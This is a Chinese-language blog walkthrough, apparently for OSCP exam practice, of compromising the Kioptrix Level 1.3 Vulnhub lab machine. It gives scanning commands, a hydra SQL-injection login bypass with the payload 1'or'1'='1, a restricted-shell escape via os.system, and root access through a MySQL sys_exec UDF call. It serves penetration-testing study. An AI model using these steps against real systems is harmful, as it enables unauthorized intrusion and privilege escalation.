OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

Ethan医生3个月前靶场100


名称说明
靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.170



靶场下载下来后是Kioptrix4_vmware.vmdk 

所以選File->New Virtual Machine
選Custom(advanced)
安裝OS的地方選擇之後安裝
然後過程中要新增虛擬硬碟的時候(virtual disk)
選擇已存在的硬碟, 選下載好的vmdk檔案就可以


信息收集

一样使用arp-scan 查看存在的主机

image.png

使用nmap开始查看启用的端口与系统

nmap -p- -sV -O 192.168.233.170         # 全端口+服务+OS识别

image.png

nmap --script http-sql-injection -p 80,443 192.168.233.170 #只做sql注入扫描

image.png


目录扫描(dirb、dirsearch、gobuster)

gobuster dir -u http://192.168.233.170 -w "指定字典" -o gobuster_info

dirsearch -u http://192.168.233.170 -w "指定字典"

将扫描出可疑的目录访问看看发现

/john目录

image.png

扫描出有database.sql这个挡案 访问看看


image.png

有个insert username为john 可能是登入的账号, 输入后发现错误

image.png


测试账号密码输入是否有SQL注入

image.png

发现有报错 既然如此开始使用SQL注入字典测试看看

只要访问页面匹配到Wrong Username就是失败

hydra -l john -P login_bypass_list.txt 192.168.233.170 http-post-form "/:username=^USER^&password=^PASS^:Wrong Username"

image.png

嘗試用帳號john
密碼用1’or’1’=’1登入結果成功(結果還是SQLi)

image.png

测试看看是不是SSH可以登入这个

由于2025版本的kali已取消使用ssh-rsa,ssh-dss

所以改使用kali2023版本:

    ssh john@192.168.233.170 -oHostKeyAlgorithms=ssh-rsa,ssh-dss

image.png

LigGoat 系统(如 Kioptrix 系列靶机)中看到的提示:

    john:~$ whoami

    *** unknown command: whoami

这边就要进行逃逸

  • 查找 suid 程序

  • 查找 crontab 后门

  • 利用写权限文件上传 payload

  • 找路径注入、环境变量绕过

直接使用echo os.system("/bin/bash") 将真实的SHELL弹出来

image.png

仔细察看看是否有可用的挡案 找到/var/www/john底下有个john.php

image.png

发现没有使用密码 这边可以尝试查看MYSQL

image.png

  

进去mysql的数据库后发现一个名为func的表

打开发现了sys_exec

将john加入admin的组

select sys_exec('usermod -a -G admin john');

使用补充:https://err0rzz.github.io/2017/12/26/UDF-mysql/


image.png

Linux 系统中,某些组(如 adminsudo)有提权权限:

  • 如果 john 加入了 adminsudo 组,你可以:

            sudo -i 直接切换到root











标签: OSCP

相关文章

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.122.40 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)查看到是Drupal 7.54ruby 44449.rb...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.70.193 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x57_HackThBox靶机_Windows_Love

OSCP备考_0x57_HackThBox靶机_Windows_Love

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。